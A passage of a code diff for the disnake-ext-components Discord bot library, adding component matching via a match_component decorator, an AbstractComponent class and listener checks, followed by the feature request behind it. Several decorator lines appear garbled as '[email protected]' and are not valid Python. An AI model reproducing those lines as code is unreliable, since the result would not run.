+ return self.reference.with_overrides(
+ style=style,
+ label=label,
+ disabled=disabled,
+ url=url,
+ emoji=emoji,
+ custom_id=await self.build_custom_id(*args, **kwargs),
+ ).as_component(disnake.ui.Button[t.Any])
+
+ @deprecation.deprecated("build_component")
async def build_button(
self,
style: disnake.ButtonStyle = disnake.ButtonStyle.secondary,
@@ -187,21 +234,25 @@ async def build_button(
*args: P.args,
**kwargs: P.kwargs,
) -> disnake.ui.Button[t.Any]:
- return disnake.ui.Button(
+ return await self.build_component(
style=style,
label=label,
disabled=disabled,
- custom_id=await self.build_custom_id(*args, **kwargs),
url=url,
emoji=emoji,
+ *args,
+ **kwargs,
)
+ build_button.__doc__ = build_component.__doc__
+
def button_listener(
*,
regex: t.Union[str, t.Pattern[str], None] = None,
sep: str = ":",
bot: t.Optional[commands.Bot] = None,
+ reference: t.Optional[ButtonReference] = None,
) -> t.Callable[[ButtonListenerCallback[ParentT, P, T]], ButtonListener[P, T]]:
"""Create a new :class:`ButtonListener` from a decorated function. The :class:`ButtonListener`
will take care of regex-matching and persistent data stored in the `custom_id` of the
@@ -236,7 +287,7 @@ def button_listener(
def wrapper(
func: ButtonListenerCallback[ParentT, P, T],
) -> ButtonListener[P, T]:
- listener = ButtonListener[P, T](func, regex=regex, sep=sep)
+ listener = ButtonListener[P, T](func, regex=regex, sep=sep, reference=reference)
if bot is not None:
bot.add_listener(listener, types_.ListenerType.BUTTON)
@@ -270,48 +321,70 @@ class SelectListener(abc.BaseListener[P, T, disnake.MessageInteraction]):
Under normal circumstances, this should not lead to conflicts. In case ':' is intentionally
part of the `custom_id`s matched by the listener, this should be set to a different value
to prevent conflicts.
+    reference: Optional[Union[:class:`disnake.SelectMenu`, :class:`disnake.ui.Select`, :class:`AbstractComponent`]]
+ A reference component used to set default values in `~.build_component`.
"""
__cog_listener_names__: t.List[types_.ListenerType] = [types_.ListenerType.SELECT]
- select_param: params.ParamInfo
+ select_param: t.Optional[params.ParamInfo]
"""The parameter with which the user-selected value(s) will be parsed. The values will be
converted to match the type annotation of this parameter.
"""
- def __new__(
- cls: t.Type[ListenerT],
- func: SelectListenerCallback[ParentT, P, T],
- **kwargs: t.Any,
- ) -> ListenerT:
- return super().__new__(cls, func, **kwargs)
+ reference: types_.AbstractComponent
+ """A reference component used to set default values in `~.build_component`."""
def __init__(
self,
- func: SelectListenerCallback[ParentT, P, T],
+ callback: SelectListenerCallback[ParentT, P, T],
*,
+ name: t.Optional[str] = None,
regex: t.Union[str, t.Pattern[str], None] = None,
sep: str = ":",
+ reference: t.Optional[SelectReference] = None,
) -> None:
- self._signature = commands.params.signature(func) # pyright: ignore
- if regex:
- self.regex = utils.ensure_compiled(regex)
- self.id_spec = utils.id_spec_from_regex(self.regex)
- self.sep = None
- else:
- self.regex = None
- self.id_spec = utils.id_spec_from_signature(self.__name__, sep, self._signature)
- self.sep = sep
+ super().__init__(callback, name=name, regex=regex, sep=sep)
special_params, listener_params = utils.extract_listener_params(self._signature)
self.params = [params.ParamInfo.from_param(param) for param in listener_params]
- if len(special_params) != 1:
+ if len(special_params) > 1:
raise TypeError(
- f"A `{type(self).__name__}` must have exactly one parameter before the "
- f"keyword-only argument separator (`*,`), got {len(special_params)}."
+                f"A `{type(self).__name__}` may have at most one parameter before "
+                f"the keyword-only argument separator (`*,`), got {len(special_params)}."
)
- self.select_param = params.ParamInfo.from_param(special_params[0])
+
+ if special_params:
+ self.select_param = params.ParamInfo.from_param(param := special_params[0])
+ self.reference = self._choose_optimal_reference(reference, param)
+
+ else:
+ self.select_param = None
+ self.reference = self._choose_optimal_reference(reference, None)
+
+ def _choose_optimal_reference(
+ self,
+ component: t.Optional[SelectReference],
+ param: t.Optional[inspect.Parameter],
+ ) -> types_.AbstractComponent:
+ if component is not None: # Manually provided takes highest priority
+ if isinstance(component, types_.AbstractComponent):
+ return component
+ return types_.AbstractComponent.from_component(component)
+
+ if param is not None and isinstance(default := param.default, types_.AbstractComponent):
+ if not default.get("options") and types_.get_origin(param.annotation) is t.Literal:
+ # No options were defined in the AbstractComponent but the parameter was
+ # annotated as literal, thus we should infer the options from the parameter.
+ return default.with_overrides(
+ options=[str(arg) for arg in types_.get_args(param.annotation)]
+ )
+
+ return default
+
+ # Nothing of use was found, return an AbstractComponent that can match any select.
+ return types_.AbstractComponent(type=disnake.ComponentType.select)
async def __call__( # pyright: ignore
self,
@@ -352,6 +425,9 @@ async def __call__( # pyright: ignore
except ValueError:
return
+ if not await utils.assert_all_checks(self.checks, inter):
+ return
+
# First convert custom_id params...
converted: t.Dict[str, t.Any] = {}
for param, arg in zip(self.params, custom_id_params):
@@ -362,13 +438,18 @@ async def __call__( # pyright: ignore
skip_validation=bool(self.regex),
)
+ # User didn't supply select params, can still be accessed through inter.values; return.
+ if self.select_param is None:
+ return await super().__call__(inter, **converted)
+
+ # User did supply select params, convert inter.values and provide it to the param.
converted_values = await self.select_param.convert(
inter.values, inter=inter, converted=converted
)
return await super().__call__(inter, converted_values, **converted)
- async def build_select(
+ async def build_component(
self,
placeholder: t.Optional[str] = None,
min_values: t.Optional[int] = None,
@@ -380,38 +461,59 @@ async def build_select(
) -> disnake.ui.Select[t.Any]:
"""Build a :class:`disnake.ui.Select` that matches this listener.
- By default, this will create a Select with custom_id based on the custom_id parameters.
- All other parameters use the normal Select defaults, except this defaults max_options to
+ By default, this will create a select with custom_id based on the custom_id parameters.
+ All other parameters use the normal select defaults, except this defaults max_options to
``len(options)``. These values can be overwritten by setting the parameter default to a
- :func:`.SelectValue`, and call it with the parameters you wish to set on the TextInput.
+ :func:`.SelectValue`, and call it with the parameters you wish to set on the select.
Parameters
----------
**kwargs: Any
- The keyword-only parameters of the listener to store on the Select's custom_id.
+ The keyword-only parameters of the listener to store on the select's custom_id.
Returns:
:class:`disnake.ui.Select`
- The newly created Select.
+ The newly created select.
"""
- # We need the underlying `inspect.Parameter` here...
- param = self.select_param.param
+ if self.select_param:
+ # We need the underlying `inspect.Parameter` here...
+ param = self.select_param.param
- # Parse options from `typing.Literal` if none were provided.
- if options is None and types_.get_origin(param.annotation) is t.Literal:
- options = [str(arg) for arg in types_.get_args(param.annotation)]
+ # Parse options from `typing.Literal` if none were provided.
+ if options is None and types_.get_origin(param.annotation) is t.Literal:
+ options = [str(arg) for arg in types_.get_args(param.annotation)]
- # Get or create the parameter's SelectValue and .
- if not isinstance(select_value := param.default, params._SelectValue):
- select_value = params._SelectValue()
+ return self.reference.with_overrides(
+ placeholder=placeholder,
+ min_values=min_values,
+ max_values=max_values,
+ options=options,
+ disabled=disabled,
+ custom_id=await self.build_custom_id(*args, **kwargs),
+ ).as_component(disnake.ui.Select[t.Any])
- return select_value.with_overrides(
+ @deprecation.deprecated("build_component")
+ async def build_select(
+ self,
+ placeholder: t.Optional[str] = None,
+ min_values: t.Optional[int] = None,
+ max_values: t.Optional[int] = None,
+ options: t.Union[t.List[disnake.SelectOption], t.List[str], t.Dict[str, str], None] = None,
+ disabled: t.Optional[bool] = None,
+ *args: P.args,
+ **kwargs: P.kwargs,
+ ) -> disnake.ui.Select[t.Any]:
+ return await self.build_component(
placeholder=placeholder,
min_values=min_values,
max_values=max_values,
options=options,
disabled=disabled,
- ).build(custom_id=await self.build_custom_id(*args, **kwargs))
+ *args,
+ **kwargs,
+ )
+
+ build_select.__doc__ = build_component.__doc__
def select_listener(
@@ -419,7 +521,8 @@ def select_listener(
regex: t.Union[str, t.Pattern[str], None] = None,
sep: str = ":",
bot: t.Optional[commands.Bot] = None,
-) -> t.Callable[[SelectListenerCallback[ParentT, P, T]], SelectListener[P, T],]:
+ reference: t.Optional[SelectReference] = None,
+) -> t.Callable[[SelectListenerCallback[ParentT, P, T]], SelectListener[P, T]]:
"""Create a new :class:`SelectListener` from a decorated function. The :class:`SelectListener`
will take care of regex-matching and persistent data stored in the `custom_id` of the
:class:`disnake.ui.Select`.
@@ -457,7 +560,7 @@ def select_listener(
def wrapper(
func: SelectListenerCallback[ParentT, P, T],
) -> SelectListener[P, T]:
- listener = SelectListener[P, T](func, regex=regex, sep=sep)
+ listener = SelectListener[P, T](func, regex=regex, sep=sep, reference=reference)
if bot is not None:
bot.add_listener(listener, types_.ListenerType.SELECT)
@@ -476,29 +579,15 @@ class ModalListener(abc.BaseListener[P, T, disnake.ModalInteraction]):
converted to match the type annotations of these parameters.
"""
- def __new__(
- cls: t.Type[ListenerT],
- func: ModalListenerCallback[ParentT, P, T],
- **kwargs: t.Any,
- ) -> ListenerT:
- return super().__new__(cls, func, **kwargs)
-
def __init__(
self,
- func: ModalListenerCallback[ParentT, P, T],
+ callback: ModalListenerCallback[ParentT, P, T],
*,
+ name: t.Optional[str] = None,
regex: t.Union[str, t.Pattern[str], None] = None,
sep: str = ":",
) -> None:
- self._signature = commands.params.signature(func) # pyright: ignore
- if regex:
- self.regex = utils.ensure_compiled(regex)
- self.id_spec = utils.id_spec_from_regex(self.regex)
- self.sep = None
- else:
- self.regex = None
- self.id_spec = utils.id_spec_from_signature(self.__name__, sep, self._signature)
- self.sep = sep
+ super().__init__(callback, name=name, regex=regex, sep=sep)
special_params, listener_params = utils.extract_listener_params(self._signature)
@@ -548,6 +637,9 @@ async def __call__( # pyright: ignore
except ValueError:
return
+ if not await utils.assert_all_checks(self.checks, inter):
+ return
+
converted: t.Dict[str, t.Any] = {}
for param, arg in zip(self.params, custom_id_params):
converted[param.name] = await param.convert(
@@ -566,7 +658,7 @@ async def __call__( # pyright: ignore
return await super().__call__(inter, **converted)
- async def build_modal( # TODO: Update with new ModalValue functionality.
+ async def build_component( # TODO: Update with new ModalValue functionality.
self,
title: str,
components: t.Optional[t.List[disnake.ui.TextInput]] = None, # TODO: Disnake 2.6 typing.
@@ -647,7 +739,7 @@ def modal_listener(
regex: t.Union[str, t.Pattern[str], None] = None,
sep: str = ":",
bot: t.Optional[commands.Bot] = None,
-) -> t.Callable[[ModalListenerCallback[ParentT, P, T]], ModalListener[P, T],]:
+) -> t.Callable[[ModalListenerCallback[ParentT, P, T]], ModalListener[P, T]]:
"""Create a new :class:`ModalListener` from a decorated function. The ModalListener will take
care of regex-matching and persistent data stored in the custom_id of the :class:`disnake.ui.Modal`.
@@ -715,3 +807,168 @@ def wrapper(
return listener
return wrapper
+
+
[email protected]
+def match_component(
+ component: t.Union[disnake.Button, disnake.ui.Button[t.Any]],
+ /,
+ *,
+ bot: t.Optional[commands.Bot] = None,
+) -> t.Callable[[ButtonListenerCallback[ParentT, P, T]], ButtonListener[P, T]]:
+ ...
+
+
[email protected]
+def match_component(
+ *,
+ component_type: t.Literal[disnake.ComponentType.button],
+ style: disnake.ButtonStyle = ...,
+ custom_id: str = ...,
+ disabled: bool = ...,
+ label: str = ...,
+ emoji: t.Union[disnake.PartialEmoji, disnake.Emoji, str] = ...,
+ bot: t.Optional[commands.Bot] = None,
+) -> t.Callable[[ButtonListenerCallback[ParentT, P, T]], ButtonListener[P, T]]:
+ ...
+
+
[email protected]
+def match_component(
+ component: t.Union[disnake.SelectMenu, disnake.ui.Select[t.Any]],
+ /,
+ *,
+ bot: t.Optional[commands.Bot] = None,
+) -> t.Callable[[SelectListenerCallback[ParentT, P, T]], SelectListener[P, T]]:
+ ...
+
+
[email protected]
+def match_component(
+ *,
+ component_type: t.Literal[disnake.ComponentType.select],
+ custom_id: str = ...,
+ placeholder: str = ...,
+ min_values: int = ...,
+ max_values: int = ...,
+ disabled: bool = ...,
+ options: t.List[disnake.SelectOption] = ...,
+ bot: t.Optional[commands.Bot] = None,
+) -> t.Callable[[SelectListenerCallback[ParentT, P, T]], SelectListener[P, T]]:
+ ...
+
+
+def match_component(
+ component: t.Optional[
+ t.Union[
+ disnake.Button,
+ disnake.ui.Button[t.Any],
+ disnake.SelectMenu,
+ disnake.ui.Select[t.Any],
+ ]
+ ] = None,
+ /,
+ *,
+ component_type: t.Optional[disnake.ComponentType] = None,
+ bot: t.Optional[commands.Bot] = None,
+ **kwargs: t.Any,
+) -> t.Callable[[t.Callable[..., t.Any]], ComponentListener]:
+    """Create a listener that only responds to components matching the provided one.
+    A component can be provided either as an actual component, or as keyword arguments with the
+    necessary information to build one. Note that these options are mutually exclusive.
+
+ This will generate a fully qualified listener based on the parameters entered. From there, one
+ can easily create matching components using the `~.build_component` methods.
+
+ Parameters
+ ----------
+ component: Union[:class:`disnake.Button`, :class:`disnake.ui.Button`, :class:`disnake.SelectMenu`, :class:`disnake.ui.Select`]
+ The component to match. As this passes a fully qualified component with all its
+ parameters set, this will make the listener look for an *exact* match of the passed
+ component.
+
+ Note that passing components is mutually exclusive with passing any keyword arguments
+ outside of `bot`.
+ component_type: :class:`disnake.ComponentType`
+ The type of component the listener is for. If using keyword args to provide a component to
+ match, this parameter is required.
+
+ Note that passing keyword arguments is mutually exclusive with passing a concrete component.
+ **kwargs: Any
+ Any other parameters that can be passed to the desired component type.
+ bot: Optional[:class:`commands.Bot`]
+ Useful when defining this listener in the main file. This can be used to automatically
+ register the listener to the bot. This is automatically taken care of inside of cogs.
+
+ Raises
+ ------
+ ValueError
+        Either both or neither of `component` and `component_type` were passed. Please make sure
+        to pass exactly one of these parameters, and do not combine a concrete
+        component with further kwargs.
+ TypeError
+        The passed component is not of a compatible type, or the passed component_type is
+        neither `disnake.ComponentType.button` nor `disnake.ComponentType.select`.
+
+ Returns
+ -------
+ Union[:class:`ButtonListener`, :class:`SelectListener`]
+ A component listener with a component matching check registered. The listener will match
+ the type of the provided component.
+ """
+ if component is not None and (component_type is not None or kwargs):
+ raise ValueError(
+ "Please provide exactly one of `component` or `component_type` and its kwargs."
+ )
+
+ if component is not None:
+ if isinstance(component, (disnake.Button, disnake.ui.Button)):
+ listener_class = ButtonListener
+ elif isinstance(
+ component, (disnake.SelectMenu, disnake.ui.Select)
+ ): # pyright: ignore # Valid redundancy imo.
+ listener_class = SelectListener
+ else:
+ raise TypeError(
+ "Expected `component` to be an instance of disnake.Button, disnake.ui.Button, "
+ f"disnake.SelectMenu or disnake.ui.Select; got {type(component).__name__}."
+ )
+
+ elif component_type is not None:
+ if component_type is disnake.ComponentType.button:
+ listener_class = ButtonListener
+ elif component_type is disnake.ComponentType.select:
+ listener_class = SelectListener
+ else:
+ raise TypeError(
+ "Expected `component_type` to be either disnake.ComponentType.button or "
+ f"disnake.ComponentType.select; got {component_type.name}."
+ )
+
+ else:
+ raise ValueError(
+ "Please provide exactly one of `component` or `component_type` and its kwargs."
+ )
+
+ if component_type:
+ kwargs["type"] = component_type
+
+ def wrapper(callback: t.Callable[..., t.Any]) -> ComponentListener:
+ if component is not None:
+ reference = types_.AbstractComponent.from_component(component)
+ name = component.custom_id
+ else:
+ reference = types_.AbstractComponent(**kwargs)
+ name = kwargs.get("custom_id")
+
+ listener = listener_class(callback, name=name, reference=reference)
+ listener.add_check(utils.build_component_matching_check(reference))
+
+ if bot:
+ for listener_type in listener.__cog_listener_names__:
+ bot.add_listener(listener, listener_type)
+
+ return listener
+
+ return wrapper
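The `assert_all_checks` gate that each listener's `__call__` now runs before converting arguments can be sketched without disnake. Here `dispatch` is a hypothetical stand-in for a listener's `__call__`, and the dict-based "interaction" objects are illustrative only:

```python
import asyncio
import inspect

async def assert_all_checks(checks, inter):
    # Run each check; sync checks return bool directly, async checks are awaited.
    for check in checks:
        result = check(inter)
        if inspect.isawaitable(result):
            result = await result
        if result is False:
            return False
    return True

async def dispatch(checks, callback, inter):
    # Mirrors the early return added to the listeners' __call__ methods:
    # a failing check makes the listener silently ignore the interaction.
    if not await assert_all_checks(checks, inter):
        return None
    return await callback(inter)

def is_owner(inter):
    return inter["user"] == "owner"

async def is_in_guild(inter):
    return inter["guild"] is not None

async def callback(inter):
    return f"handled {inter['user']}"

print(asyncio.run(dispatch([is_owner, is_in_guild], callback, {"user": "owner", "guild": 1})))
print(asyncio.run(dispatch([is_owner, is_in_guild], callback, {"user": "guest", "guild": 1})))
```

This prints `handled owner` for the passing interaction and `None` for the one rejected by `is_owner`.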
diff --git a/disnake_ext_components/params.py b/disnake_ext_components/params.py
index 010a4f5..d0f366c 100644
--- a/disnake_ext_components/params.py
+++ b/disnake_ext_components/params.py
@@ -48,6 +48,7 @@
disnake.abc.GuildChannel: patterns.SNOWFLAKE,
disnake.Guild: patterns.SNOWFLAKE,
disnake.Message: patterns.SNOWFLAKE,
+ disnake.Permissions: patterns.STRICTINT,
# disnake.Emoji: ID, # temporarily(?) disabled
# fmt: on
}
@@ -429,7 +430,6 @@ def with_overrides(
options: t.Union[t.List[disnake.SelectOption], t.List[str], t.Dict[str, str], None] = None,
disabled: t.Optional[bool] = None,
) -> _SelectValue:
- print(options)
return type(self)(
placeholder=self.placeholder if placeholder is None else placeholder,
min_values=self.min_values if min_values is None else min_values,
@@ -458,8 +458,9 @@ def SelectValue(
options: t.Union[t.List[disnake.SelectOption], t.List[str], t.Dict[str, str], None] = None,
disabled: bool = False,
) -> t.Any:
- return _SelectValue(
- placeholder,
+ return types_.AbstractComponent(
+ type=disnake.ComponentType.select,
+ placeholder=placeholder,
min_values=min_values,
max_values=max_values,
options=options,
diff --git a/disnake_ext_components/types_.py b/disnake_ext_components/types_.py
index cfb2ea9..be578fe 100644
--- a/disnake_ext_components/types_.py
+++ b/disnake_ext_components/types_.py
@@ -1,17 +1,17 @@
from __future__ import annotations
import enum
-import functools
import re
import sys
import typing as t
+import disnake
+
__all__ = [
"Annotated",
"get_args",
"get_origin",
"ListenerType",
- "partial",
"Converted",
]
@@ -20,33 +20,27 @@
_T_co = t.TypeVar("_T_co", covariant=True)
_T_contra = t.TypeVar("_T_contra", contravariant=True)
-MaybeAwaitable = t.Union[t.Awaitable[_T], _T]
+Coro = t.Coroutine[t.Any, t.Any, _T]
+MaybeCoro = t.Union[Coro[_T], _T]
MaybeSequence = t.Union[t.Sequence[_T], _T]
+InteractionT = t.TypeVar("InteractionT", disnake.MessageInteraction, disnake.ModalInteraction)
+MessageComponentT = t.TypeVar(
+ "MessageComponentT",
+ bound=t.Union[
+ disnake.ui.Button[t.Any],
+ disnake.ui.Select[t.Any],
+ ],
+)
+
+CheckCallback = t.Callable[[InteractionT], MaybeCoro[bool]]
+CheckT = t.TypeVar("CheckT", bound=CheckCallback[t.Any])
if sys.version_info >= (3, 10):
from typing import Annotated, get_args, get_origin
else:
from typing_extensions import Annotated, get_args, get_origin
-if sys.version_info >= (3, 9):
- partial = functools.partial
-
-else:
-
- class partial(functools.partial, t.Generic[_T]): # pyright: ignore
- """This intermediary class is needed to have type-checking work properly between Python
- versions 3.8 through 3.10. Since `functools.partial` became a generic in Python 3.9,
- type-checkers expect this in versions 3.9 and up, whereas it would raise in version 3.8.
-
- To get around this, for version 3.8 specifically, we create this intermediary class to
- make `functools.partial` behave like its version 3.9+ counterpart, where the return type
- can be set as the generic type specifier.
- """
-
- def __call__(self, *args: t.Any, **kwargs: t.Any) -> _T:
- return t.cast(_T, super().__call__(*args, **kwargs))
-
class ListenerType(str, enum.Enum):
"""A string enum that contains all listener types."""
@@ -130,13 +124,13 @@ async def listener(
# TODO: Should probably rename these.
- converter_to: t.Callable[..., MaybeAwaitable[t.Any]]
+ converter_to: t.Callable[..., MaybeCoro[t.Any]]
"""The custom converter function used to convert input from :class:`str` to the return type
of the function. Make sure that this function can convert anything matched by the provided
regex pattern.
"""
- converter_from: t.Callable[..., MaybeAwaitable[t.Any]]
+ converter_from: t.Callable[..., MaybeCoro[t.Any]]
"""The custom converter function used to convert back to :class:`str`. This is used to ensure
the value is inserted into the custom_id in such a manner that it can be matched anew. Make
sure that whatever is returned by this function can be matched by the provided regex pattern.
@@ -145,8 +139,8 @@ async def listener(
def __init__(
self,
regex: t.Pattern[str],
- converter_to: t.Callable[..., MaybeAwaitable[t.Any]],
- converter_from: t.Callable[..., MaybeAwaitable[t.Any]],
+ converter_to: t.Callable[..., MaybeCoro[t.Any]],
+ converter_from: t.Callable[..., MaybeCoro[t.Any]],
):
self.regex = regex
self.converter_to = converter_to
@@ -158,3 +152,124 @@ def __repr__(self):
f"converter_to={self.converter_to.__name__}(), "
f"converter_from={self.converter_from.__name__}()]"
)
+
+
+class SelectOption(disnake.SelectOption):
+ __slots__ = ()
+
+ def __eq__(self, other: t.Any) -> bool:
+ if not isinstance(other, disnake.SelectOption):
+ return False
+
+ for slot in disnake.SelectOption.__slots__:
+ value = getattr(self, slot)
+ other_value = getattr(other, slot)
+
+ if value is disnake.utils.MISSING and other_value is not disnake.utils.MISSING:
+ return False
+
+ if other_value != value:
+ return False
+
+ return True
+
+ @classmethod
+ def _convert(cls, other: disnake.SelectOption):
+ return cls(**{slot: getattr(other, slot) for slot in disnake.SelectOption.__slots__})
+
+
+def _parse_select_options(
+ options: t.Union[t.List[disnake.SelectOption], t.List[str], t.Dict[str, str]]
+) -> t.List[SelectOption]:
+ # Had to yoink this from disnake as the `ui.select` module is shadowed by the decorator...
+ # Gave me the opportunity to work with custom SelectOptions that support comparison though.
+
+ if isinstance(options, dict):
+ return [SelectOption(label=key, value=val) for key, val in options.items()]
+
+ return [
+ SelectOption._convert(opt)
+ if isinstance(opt, disnake.SelectOption)
+ else SelectOption(label=opt)
+ for opt in options
+ ]
+
+
+class AbstractComponent:
+ __sentinel = object()
+
+    __slots__: t.Tuple[str, ...] = tuple(
+ set(disnake.Component.__slots__)
+ | set(disnake.Button.__slots__)
+ | set(disnake.SelectMenu.__slots__)
+ )
+
+ def __init__(self, **kwargs: t.Any):
+ # Handle special cases...
+ if "emoji" in kwargs and isinstance(emoji := kwargs["emoji"], str):
+ kwargs["emoji"] = disnake.PartialEmoji.from_str(emoji)
+
+ if "options" in kwargs:
+ kwargs["options"] = _parse_select_options(kwargs["options"] or [])
+
+ for k, v in kwargs.items():
+ setattr(self, k, v)
+
+ @classmethod
+ def from_component(
+ cls,
+ component: t.Union[
+ disnake.Button,
+ disnake.ui.Button[t.Any],
+ disnake.SelectMenu,
+ disnake.ui.Select[t.Any],
+ ],
+ ) -> AbstractComponent:
+ self = cls()
+ for slot in cls.__slots__:
+ value = getattr(component, slot, cls.__sentinel)
+ if value is not cls.__sentinel:
+ setattr(self, slot, value)
+
+ # Ensure custom SelectOptions
+ options: t.Any = getattr(self, "options", self.__sentinel)
+ if options is not self.__sentinel:
+ setattr(self, "options", _parse_select_options(options))
+
+ return self
+
+ def __iter__(self) -> t.Generator[t.Tuple[str, t.Any], None, None]:
+ for slot in self.__slots__:
+ value = getattr(self, slot, self.__sentinel)
+ if value is not self.__sentinel:
+ yield slot, value
+
+ def __eq__(self, other: t.Union[disnake.Button, disnake.SelectMenu]) -> bool: # type: ignore
+ return not any(value != getattr(other, slot, self.__sentinel) for slot, value in self)
+
+ def __repr__(self):
+ return f"AbstractComponent({', '.join(f'{k}={v}' for k, v in self)})"
+
+ def get(self, key: str) -> t.Optional[t.Any]:
+ return getattr(self, key, None)
+
+ def copy(self) -> AbstractComponent:
+ return AbstractComponent(**dict(self))
+
+ def with_overrides(self, **kwargs: t.Any):
+ copy = self.copy()
+ copy.__init__(**{k: v for k, v in kwargs.items() if v is not None})
+ return copy
+
+ def as_component(self, template: t.Type[MessageComponentT]) -> MessageComponentT:
+ kwargs = dict(self)
+ type_ = kwargs.pop("type", self.__sentinel)
+
+ component = template(**kwargs)
+ if component.type is not type_:
+ raise ValueError(
+ f"This AbstractComponent is of type {type_}, "
+ f"and is therefore incompatible with {template.__name__}."
+ )
+
+ return component
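`AbstractComponent.__eq__` above only compares attributes that were explicitly set, which is what lets a partial reference match many concrete components. A disnake-free sketch of that sentinel-based subset matching (the class names here are illustrative stand-ins, not the library's own):

```python
# Only attributes explicitly set on the abstract component are compared;
# unset slots are skipped entirely via the sentinel.
_SENTINEL = object()

class MiniAbstractComponent:
    __slots__ = ("type", "label", "custom_id", "disabled")

    def __init__(self, **kwargs):
        for key, value in kwargs.items():
            setattr(self, key, value)

    def __iter__(self):
        # Yield only the (slot, value) pairs that were actually set.
        for slot in self.__slots__:
            value = getattr(self, slot, _SENTINEL)
            if value is not _SENTINEL:
                yield slot, value

    def __eq__(self, other):
        # Match when every set attribute agrees with the concrete component.
        return not any(
            value != getattr(other, slot, _SENTINEL) for slot, value in self
        )

class FakeButton:
    def __init__(self, type, label, custom_id, disabled=False):
        self.type = type
        self.label = label
        self.custom_id = custom_id
        self.disabled = disabled

abstract = MiniAbstractComponent(type="button", label="confirm")
print(abstract == FakeButton("button", "confirm", "confirm:123"))  # True: unset slots ignored
print(abstract == FakeButton("button", "cancel", "cancel:123"))    # False: label differs
```

The same asymmetry drives `build_component_matching_check` below: a reference built from kwargs matches any component whose attributes include those kwargs.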
diff --git a/disnake_ext_components/utils.py b/disnake_ext_components/utils.py
index 80982ad..2023343 100644
--- a/disnake_ext_components/utils.py
+++ b/disnake_ext_components/utils.py
@@ -5,6 +5,8 @@
import disnake
from disnake.ext import commands
+from . import types_
+
__all__ = [
"id_spec_from_signature",
"id_spec_from_regex",
@@ -22,6 +24,11 @@ def id_spec_from_signature(name: str, sep: str, signature: inspect.Signature) ->
The name of the listener function to which the signature belongs.
signature: :class:`inspect.Signature`
The function signature of the listener function.
+
+ Returns
+ -------
+ :class:`str`
+ The custom_id spec that was built from the provided function signature.
"""
_, custom_id_params = extract_listener_params(signature)
if not custom_id_params:
@@ -38,6 +45,11 @@ def id_spec_from_regex(regex: t.Pattern[str]) -> str:
----------
regex: :class:`re.Pattern`
The regex pattern that is to be deconstructed.
+
+ Returns
+ -------
+ :class:`str`
+ The custom_id spec that was extracted from the regex pattern.
"""
return re.sub(r"\(\?P<(.+?)>.*?\)", lambda m: f"{{{m[1]}}}", regex.pattern)
@@ -71,7 +83,7 @@ def extract_listener_params(
- The second tuple contains all remaining parameters, which are parsed from the `custom_id`.
"""
param_iter = iter(signature.parameters.values())
- for param in param_iter:
+ for pos, param in enumerate(param_iter):
if commands.params.issubclass_(param.annotation, disnake.Interaction):
break
else:
@@ -80,6 +92,9 @@ def extract_listener_params(
"Please make sure the interaction parameter is properly annotated in the listener."
)
+ if pos > 1:
+        raise TypeError("Only the listener callback's `self` parameter may precede the interaction parameter.")
+
special_params: t.List[inspect.Parameter] = []
for param in param_iter:
@@ -109,5 +124,83 @@ def ensure_compiled(
compiled, it is returned as-is.
flags: :class:`re.RegexFlag`
Any flags to apply to compilation. By default this has the same behaviour as `re.compile`.
+
+ Returns
+ -------
+ :class:`re.Pattern`
+ The compiled regex pattern.
"""
return re.compile(pattern, flags) if isinstance(pattern, str) else pattern
+
+
+async def assert_all_checks(
+ checks: t.Sequence[types_.CheckCallback[types_.InteractionT]],
+ inter: types_.InteractionT,
+) -> bool:
+ """Ensure all checks for a given listener pass.
+
+ Parameters
+ ----------
+ checks: Sequence[Callable[[:class:`disnake.Interaction`], MaybeCoro[:class:`bool`]]]
+ The checks that should be run for the listener.
+ inter: :class:`disnake.Interaction`
+ The interaction to supply to the checks.
+
+ Returns
+ -------
+ :class:`bool`
+ Whether all checks succeeded or not.
+ """
+ for check in checks:
+ result = check(inter)
+ if inspect.isawaitable(result):
+ result = await result
+
+ if result is False:
+ return False
+
+ return True
+
+
+def build_component_matching_check(
+ component: t.Union[
+ disnake.ui.Button[t.Any],
+ disnake.ui.Select[t.Any],
+ types_.AbstractComponent,
+ None,
+ ] = None,
+ /,
+ **kwargs: t.Any,
+) -> t.Callable[[disnake.MessageInteraction], bool]:
+ """Build a check function to compare a component with the incoming interaction's component.
+ Takes either a component, or kwargs that build a component. A component will look for an exact
+ match, whereas kwargs will look for a "superset" of the provided kwargs.
+
+ Parameters
+ ----------
+ component: Union[:class:`disnake.ui.Button`, :class:`disnake.ui.Select` :class:`.types_.AbstractComponent`]
+ The component to match.
+ kwargs: Any
+ The parameters that make up a (partial) component.
+
+ Returns
+ -------
+ Callable[[:class:`disnake.MessageInteraction`], :class:`bool`]
+ The check function. Takes a message interaction and returns a bool depending on whether the
+ component matches.
+ """ # noqa: E501
+ if component is not None:
+ if kwargs:
+ raise ValueError("Please provide either a component or kwargs.")
+
+ if isinstance(component, types_.AbstractComponent):
+ check_component = component
+ else:
+ check_component = types_.AbstractComponent.from_component(component)
+ else:
+ check_component = types_.AbstractComponent(**kwargs)
+
+ def check(inter: disnake.MessageInteraction) -> bool:
+ return check_component == inter.component
+
+ return check
diff --git a/examples/component_matching.py b/examples/component_matching.py
new file mode 100644
index 0000000..37a12b0
--- /dev/null
+++ b/examples/component_matching.py
@@ -0,0 +1,35 @@
+import disnake
+from disnake.ext import commands, components
+
+
+class ComponentMatchingExample(commands.Cog):
+ def __init__(self, bot: commands.Bot):
+ self.bot = bot
+
+ @components.match_component(component_type=disnake.ComponentType.button, label="simple_delete")
+ async def simple_delete_listener(self, inter: disnake.MessageInteraction):
+ """Check if the author has sufficient permissions. If so, delete the message."""
+ await inter.response.defer()
+ print(inter.component.custom_id)
+
+ if (
+ # DMs...
+ isinstance(inter.channel, disnake.PartialMessageable)
+ or isinstance(inter.author, disnake.User)
+ # Author has manage_message permissions...
+ or inter.channel.permissions_for(inter.author).manage_messages
+ ):
+ await inter.delete_original_message()
+ return
+
+ await inter.followup.send("You are not allowed to take this action!", ephemeral=True)
+
+ @commands.slash_command()
+ async def send_a_thing(self, inter: disnake.CommandInteraction):
+ await inter.response.send_message(
+ "Here's a thing.", components=await self.simple_delete_listener.build_component()
+ )
+
+
+def setup(bot: commands.Bot):
+ bot.add_cog(ComponentMatchingExample(bot))
| component matching to callbacks
## Description
A way to assign a callback to always listen for components matching certain attributes.
e.g., for a button: the button colour and custom_id, and the fact that it *is* a button
```py
@components.match_component(disnake.Button(custom_id="button!", color="..."))
```
```py
@components.match_component(component_type=disnake.ComponentType.button, custom_id="...")
```
This effectively allows a button callback.
